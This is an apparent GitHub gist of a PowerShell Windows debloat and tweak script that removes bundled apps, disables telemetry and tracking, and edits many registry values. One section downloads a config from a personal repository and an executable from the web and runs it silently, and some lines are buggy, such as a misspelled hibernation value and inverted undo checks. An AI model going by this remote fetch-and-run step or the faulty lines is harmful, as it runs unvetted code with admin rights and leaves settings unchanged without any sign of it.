Skip to content

Instantly share code, notes, and snippets.

@ZerGo0
Created Apr 9, 2022
Embed
What would you like to do?
#region buttonDebloat
$formWindowsToolbox.WindowState = 1
$Bloatware = @(
#Unnecessary Windows 10 AppX Apps
"Microsoft.3DBuilder"
"Microsoft.AppConnector"
"Microsoft.BingFinance"
"Microsoft.BingNews"
"Microsoft.BingSports"
"Microsoft.BingTranslator"
"Microsoft.BingWeather"
"Microsoft.GetHelp"
"Microsoft.Getstarted"
"Microsoft.Messaging"
"Microsoft.Microsoft3DViewer"
"Microsoft.MicrosoftSolitaireCollection"
"Microsoft.NetworkSpeedTest"
"Microsoft.News"
"Microsoft.Office.Lens"
"Microsoft.Office.Sway"
"Microsoft.OneConnect"
"Microsoft.People"
"Microsoft.Print3D"
"Microsoft.SkypeApp"
"Microsoft.StorePurchaseApp"
"Microsoft.Wallet"
"Microsoft.Whiteboard"
"Microsoft.WindowsAlarms"
"microsoft.windowscommunicationsapps"
"Microsoft.WindowsFeedbackHub"
"Microsoft.WindowsMaps"
"Microsoft.WindowsSoundRecorder"
"Microsoft.ZuneMusic"
"Microsoft.ZuneVideo"
#Sponsored Windows 10 AppX Apps
#Add sponsored/featured apps to remove in the "*AppName*" format
"*EclipseManager*"
"*ActiproSoftwareLLC*"
"*AdobeSystemsIncorporated.AdobePhotoshopExpress*"
"*Duolingo-LearnLanguagesforFree*"
"*PandoraMediaInc*"
"*CandyCrush*"
"*BubbleWitch3Saga*"
"*Wunderlist*"
"*Flipboard*"
"*Twitter*"
"*Facebook*"
"*Royal Revolt*"
"*Sway*"
"*Speed Test*"
"*Dolby*"
"*Viber*"
"*ACGMediaPlayer*"
"*Netflix*"
"*OneCalendar*"
"*LinkedInforWindows*"
"*HiddenCityMysteryofShadows*"
"*Hulu*"
"*HiddenCity*"
"*AdobePhotoshopExpress*"
#Optional: Typically not removed but you can if you need to for some reason
"*Microsoft.Advertising.Xaml*"
#"*Microsoft.BingWeather*"
#"*Microsoft.MSPaint*"
#"*Microsoft.MicrosoftStickyNotes*"
#"*Microsoft.Windows.Photos*"
#"*Microsoft.WindowsCalculator*"
#"*Microsoft.WindowsStore*"
)
foreach ($Bloat in $Bloatware) {
Get-AppxPackage -Name $Bloat| Remove-AppxPackage
#Get-AppxProvisionedPackage -Online | Where-Object DisplayName -like $Bloat | Remove-AppxProvisionedPackage -Online
Write-Host "Trying to remove $Bloat."
}
#Stops edge from taking over as the default .PDF viewer
Write-Host "Stopping Edge from taking over as the default .PDF viewer"
# Identify the edge application class
$Packages = "HKCU:SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Repository\Packages"
$edge = Get-ChildItem $Packages -Recurse -include "MicrosoftEdge"
# Specify the paths to the file and URL associations
$FileAssocKey = Join-Path $edge.PSPath Capabilities\FileAssociations
$URLAssocKey = Join-Path $edge.PSPath Capabilities\URLAssociations
# get the software classes for the file and URL types that Edge will associate
$FileTypes = Get-Item $FileAssocKey
$URLTypes = Get-Item $URLAssocKey
$FileAssoc = Get-ItemProperty $FileAssocKey
$URLAssoc = Get-ItemProperty $URLAssocKey
$Associations = @()
$Filetypes.Property | foreach {$Associations += $FileAssoc.$_}
$URLTypes.Property | foreach {$Associations += $URLAssoc.$_}
# add registry values in each software class to stop edge from associating as the default
foreach ($Association in $Associations)
{
$Class = Join-Path HKCU:SOFTWARE\Classes $Association
#if (Test-Path $class)
# {write-host $Association}
# Get-Item $Class
Set-ItemProperty $Class -Name NoOpenWith -Value ""
Set-ItemProperty $Class -Name NoStaticDefaultVerb -Value ""
}
#Removes Paint3D stuff from context menu
$Paint3Dstuff = @(
"HKCR:\SystemFileAssociations\.3mf\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.bmp\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.fbx\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.gif\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.jfif\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.jpe\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.jpeg\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.jpg\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.png\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.tif\Shell\3D Edit"
"HKCR:\SystemFileAssociations\.tiff\Shell\3D Edit"
)
#Rename reg key to remove it, so it's revertible
foreach ($Paint3D in $Paint3Dstuff) {
If (Test-Path $Paint3D) {
$rmPaint3D = $Paint3D + "_"
Set-Item $Paint3D $rmPaint3D
}
}
Write-Host "Finished Debloating" -ForegroundColor Green
$formWindowsToolbox.WindowState = 0
#endregion buttonDebloat
#region buttonBoost
$formWindowsToolbox.WindowState = 1
Write-Host "Creating Restore Point incase something bad happens"
Enable-ComputerRestore -Drive "C:\"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /V "SystemRestorePointCreationFrequency" /T REG_DWORD /D 0 /F
Checkpoint-Computer -Description "Windows Toolbox(Automatic)" -RestorePointType "MODIFY_SETTINGS"
Write-Host 'RestorePoint has been Created' -ForegroundColor green
Write-Host "Tweaking...the Recommended Settings"
Write-Host "Please wait"
Import-Module BitsTransfer
Start-BitsTransfer -Source "https://raw.githubusercontent.com/alexrybak0444/New/main/ooshutup10.cfg" -Destination ooshutup10.cfg
Start-BitsTransfer -Source "https://dl5.oo-software.com/files/ooshutup10/OOSU10.exe" -Destination OOSU10.exe
./OOSU10.exe ooshutup10.cfg /quiet
Write-Host "Disabling Telemetry..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Disable-ScheduledTask -TaskName "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" | Out-Null
Disable-ScheduledTask -TaskName "Microsoft\Windows\Application Experience\ProgramDataUpdater" | Out-Null
Disable-ScheduledTask -TaskName "Microsoft\Windows\Autochk\Proxy" | Out-Null
Disable-ScheduledTask -TaskName "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" | Out-Null
Disable-ScheduledTask -TaskName "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" | Out-Null
Disable-ScheduledTask -TaskName "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" | Out-Null
Write-Host "Disabling Application suggestions..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "ContentDeliveryAllowed" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "OemPreInstalledAppsEnabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "PreInstalledAppsEnabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "PreInstalledAppsEverEnabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SilentInstalledAppsEnabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SubscribedContent-338387Enabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SubscribedContent-338388Enabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SubscribedContent-338389Enabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SubscribedContent-353698Enabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SystemPaneSuggestionsEnabled" -Type DWord -Value 0
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CloudContent")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CloudContent" -Force | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CloudContent" -Name "DisableWindowsConsumerFeatures" -Type DWord -Value 1
Write-Host "Disabling Activity History..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableActivityFeed" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "PublishUserActivities" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "UploadUserActivities" -Type DWord -Value 0
Write-Host "Disabling Location Tracking..."
If (!(Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location")) {
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Force | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Type String -Value "Deny"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" -Name "SensorPermissionState" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\lfsvc\Service\Configuration" -Name "Status" -Type DWord -Value 0
Write-Host "Disabling automatic Maps updates..."
Set-ItemProperty -Path "HKLM:\SYSTEM\Maps" -Name "AutoUpdateEnabled" -Type DWord -Value 0
Write-Host "Disabling Feedback..."
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\Siuf\Rules")) {
New-Item -Path "HKCU:\SOFTWARE\Microsoft\Siuf\Rules" -Force | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Siuf\Rules" -Name "NumberOfSIUFInPeriod" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "DoNotShowFeedbackNotifications" -Type DWord -Value 1
Disable-ScheduledTask -TaskName "Microsoft\Windows\Feedback\Siuf\DmClient" -ErrorAction SilentlyContinue | Out-Null
Disable-ScheduledTask -TaskName "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" -ErrorAction SilentlyContinue | Out-Null
Write-Host "Disabling Tailored Experiences..."
If (!(Test-Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\CloudContent")) {
New-Item -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\CloudContent" -Force | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\CloudContent" -Name "DisableTailoredExperiencesWithDiagnosticData" -Type DWord -Value 1
Write-Host "Disabling Advertising ID..."
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AdvertisingInfo")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AdvertisingInfo" | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AdvertisingInfo" -Name "DisabledByGroupPolicy" -Type DWord -Value 1
Write-Host "Disabling Error reporting..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting" -Name "Disabled" -Type DWord -Value 1
Disable-ScheduledTask -TaskName "Microsoft\Windows\Windows Error Reporting\QueueReporting" | Out-Null
Write-Host "Restricting Windows Update P2P only to local network..."
If (!(Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config")) {
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" -Name "DODownloadMode" -Type DWord -Value 1
Write-Host "Stopping and disabling Diagnostics Tracking Service..."
Stop-Service "DiagTrack" -WarningAction SilentlyContinue
Set-Service "DiagTrack" -StartupType Disabled
Write-Host "Stopping and disabling WAP Push Service..."
Stop-Service "dmwappushservice" -WarningAction SilentlyContinue
Set-Service "dmwappushservice" -StartupType Disabled
Write-Host "Enabling F8 boot menu options..."
bcdedit /set `{current`} bootmenupolicy Legacy | Out-Null
Write-Host "Stopping and disabling Home Groups services..."
Stop-Service "HomeGroupListener" -WarningAction SilentlyContinue
Set-Service "HomeGroupListener" -StartupType Disabled
Stop-Service "HomeGroupProvider" -WarningAction SilentlyContinue
Set-Service "HomeGroupProvider" -StartupType Disabled
Write-Host "Disabling Remote Assistance..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Remote Assistance" -Name "fAllowToGetHelp" -Type DWord -Value 0
Write-Host "Disabling Storage Sense..."
Remove-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" -Recurse -ErrorAction SilentlyContinue
Write-Host "Stopping and disabling Superfetch service..."
Stop-Service "SysMain" -WarningAction SilentlyContinue
Set-Service "SysMain" -StartupType Disabled
Write-Host "Setting BIOS time to UTC..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\TimeZoneInformation" -Name "RealTimeIsUniversal" -Type DWord -Value 1
Write-Host "Disabling Hibernation..."
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Session Manager\Power" -Name "HibernteEnabled" -Type Dword -Value 0
If (!(Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FlyoutMenuSettings")) {
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FlyoutMenuSettings" | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FlyoutMenuSettings" -Name "ShowHibernateOption" -Type Dword -Value 0
Write-Host "Showing task manager details..."
$taskmgr = Start-Process -WindowStyle Hidden -FilePath taskmgr.exe -PassThru
Do {
Start-Sleep -Milliseconds 100
$preferences = Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\TaskManager" -Name "Preferences" -ErrorAction SilentlyContinue
} Until ($preferences)
Stop-Process $taskmgr
$preferences.Preferences[28] = 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\TaskManager" -Name "Preferences" -Type Binary -Value $preferences.Preferences
Write-Host "Showing file operations details..."
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\OperationStatusManager")) {
New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\OperationStatusManager" | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\OperationStatusManager" -Name "EnthusiastMode" -Type DWord -Value 1
Write-Host "Hiding Task View button..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowTaskViewButton" -Type DWord -Value 0
Write-Host "Hiding People icon..."
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People")) {
New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" -Name "PeopleBand" -Type DWord -Value 0
Write-Host "Enabling NumLock after startup..."
If (!(Test-Path "HKU:")) {
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}
Set-ItemProperty -Path "HKU:\.DEFAULT\Control Panel\Keyboard" -Name "InitialKeyboardIndicators" -Type DWord -Value 2147483650
Add-Type -AssemblyName System.Windows.Forms
If (!([System.Windows.Forms.Control]::IsKeyLocked('NumLock'))) {
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{NUMLOCK}')
}
Write-Host "Changing default Explorer view to This PC..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "LaunchTo" -Type DWord -Value 1
Write-Host "Hiding 3D Objects icon from This PC..."
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}" -Recurse -ErrorAction SilentlyContinue
# Network Tweaks
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "IRPStackSize" -Type DWord -Value 20
# SVCHost Tweak
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control" -Name "SvcHostSplitThresholdInKB" -Type DWord -Value 4194304
#Write-Host "Installing Windows Media Player..."
#Enable-WindowsOptionalFeature -Online -FeatureName "WindowsMediaPlayer" -NoRestart -WarningAction SilentlyContinue | Out-Null
Write-Host "Disable News and Interests"
Set-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Windows Feeds" -Name "EnableFeeds" -Type DWord -Value 0
ipconfig /flushdns
Write-Host "Boostup Completed" -ForegroundColor green
$formWindowsToolbox.WindowState = 0
#endregion buttonBoost
#region Undo
Write-Host "Enabling Telemetry..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 1
Write-Host "Enabling Application suggestions..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "ContentDeliveryAllowed" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "OemPreInstalledAppsEnabled" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "PreInstalledAppsEnabled" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "PreInstalledAppsEverEnabled" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SilentInstalledAppsEnabled" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SubscribedContent-338387Enabled" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SubscribedContent-338388Enabled" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SubscribedContent-338389Enabled" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SubscribedContent-353698Enabled" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SystemPaneSuggestionsEnabled" -Type DWord -Value 1
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CloudContent")) {
Remove-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CloudContent" -Recurse -ErrorAction SilentlyContinue
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CloudContent" -Name "DisableWindowsConsumerFeatures" -Type DWord -Value 0
Write-Host "Enabling Activity History..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableActivityFeed" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "PublishUserActivities" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "UploadUserActivities" -Type DWord -Value 1
Write-Host "Enable Location Tracking..."
If (!(Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location")) {
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Recurse -ErrorAction SilentlyContinue
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Type String -Value "Allow"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" -Name "SensorPermissionState" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\lfsvc\Service\Configuration" -Name "Status" -Type DWord -Value 1
Write-Host "Enabling automatic Maps updates..."
Set-ItemProperty -Path "HKLM:\SYSTEM\Maps" -Name "AutoUpdateEnabled" -Type DWord -Value 1
Write-Host "Enabling Feedback..."
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\Siuf\Rules")) {
Remove-Item -Path "HKCU:\SOFTWARE\Microsoft\Siuf\Rules" -Recurse -ErrorAction SilentlyContinue
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Siuf\Rules" -Name "NumberOfSIUFInPeriod" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "DoNotShowFeedbackNotifications" -Type DWord -Value 0
Write-Host "Enabling Tailored Experiences..."
If (!(Test-Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\CloudContent")) {
Remove-Item -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\CloudContent" -Recurse -ErrorAction SilentlyContinue
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\CloudContent" -Name "DisableTailoredExperiencesWithDiagnosticData" -Type DWord -Value 0
Write-Host "Disabling Advertising ID..."
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AdvertisingInfo")) {
Remove-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AdvertisingInfo" -Recurse -ErrorAction SilentlyContinue
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AdvertisingInfo" -Name "DisabledByGroupPolicy" -Type DWord -Value 0
Write-Host "Allow Error reporting..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting" -Name "Disabled" -Type DWord -Value 0
Write-Host "Allowing Diagnostics Tracking Service..."
Stop-Service "DiagTrack" -WarningAction SilentlyContinue
Set-Service "DiagTrack" -StartupType Manual
Write-Host "Allowing WAP Push Service..."
Stop-Service "dmwappushservice" -WarningAction SilentlyContinue
Set-Service "dmwappushservice" -StartupType Manual
Write-Host "Allowing Home Groups services..."
Stop-Service "HomeGroupListener" -WarningAction SilentlyContinue
Set-Service "HomeGroupListener" -StartupType Manual
Stop-Service "HomeGroupProvider" -WarningAction SilentlyContinue
Set-Service "HomeGroupProvider" -StartupType Manual
Write-Host "Enabling Storage Sense..."
New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" | Out-Null
Write-Host "Allowing Superfetch service..."
Stop-Service "SysMain" -WarningAction SilentlyContinue
Set-Service "SysMain" -StartupType Manual
Write-Host "Setting BIOS time to Local Time instead of UTC..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\TimeZoneInformation" -Name "RealTimeIsUniversal" -Type DWord -Value 0
Write-Host "Enabling Hibernation..."
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Session Manager\Power" -Name "HibernteEnabled" -Type Dword -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FlyoutMenuSettings" -Name "ShowHibernateOption" -Type Dword -Value 1
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization" -Name "NoLockScreen" -ErrorAction SilentlyContinue
Write-Host "Hiding file operations details..."
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\OperationStatusManager")) {
Remove-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\OperationStatusManager" -Recurse -ErrorAction SilentlyContinue
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\OperationStatusManager" -Name "EnthusiastMode" -Type DWord -Value 0
Write-Host "Showing Task View button..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowTaskViewButton" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" -Name "PeopleBand" -Type DWord -Value 1
Write-Host "Changing default Explorer view to Quick Access..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "LaunchTo" -Type DWord -Value 0
Write-Host "Boostup undo Completed - Revert back to stock setting" -ForegroundColor green
#endregion Undo
#region buttonFixPhoneApp
Write-Host "`nEnable needed data collection for Your Phone..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableMmx" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableCdp" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Messaging" -Name "AllowMessageSync" -Type DWord -Value 1
Write-Host "Allowing Background Apps..."
Get-ChildItem -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" -Exclude "Microsoft.Windows.Cortana*" | ForEach {
Remove-ItemProperty -Path $_.PsPath -Name "Disabled" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path $_.PsPath -Name "DisabledByUser" -ErrorAction SilentlyContinue
}
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" -Name "GlobalUserDisabled" -Type DWord -Value 0
Write-Host "You may need to Reboot and right-click Your Phone app and select repair"
#endregion buttonFixPhoneApp
#region buttonEnableLocation
Write-Host "`nEnabling Location Provider..."
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" -Name "DisableWindowsLocationProvider" -ErrorAction SilentlyContinue
Write-Host "Enabling Location Scripting..."
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" -Name "DisableLocationScripting" -ErrorAction SilentlyContinue
Write-Host "Enabling Location..."
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" -Name "DisableLocation" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" -Name "SensorPermissionState" -ErrorAction SilentlyContinue
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" -Name "Value" -Type String -Value "Allow"
Write-Host "Allow access to Location..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Type String -Value "Allow"
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\lfsvc\Service\Configuration" -Name "Status" -Type DWord -Value "1"
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy" -Name "LetAppsAccessLocation" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy" -Name "LetAppsAccessLocation_UserInControlOfTheseApps" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy" -Name "LetAppsAccessLocation_ForceAllowTheseApps" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppPrivacy" -Name "LetAppsAccessLocation_ForceDenyTheseApps" -ErrorAction SilentlyContinue
Write-Host "Done - Reverted to Stock Settings" -ForegroundColor green
#endregion buttonEnableLocation
#region buttonBalancedMode
$A = (powercfg.exe -l | findstr -i Balanced).split()
Powercfg.exe /S $A[3]
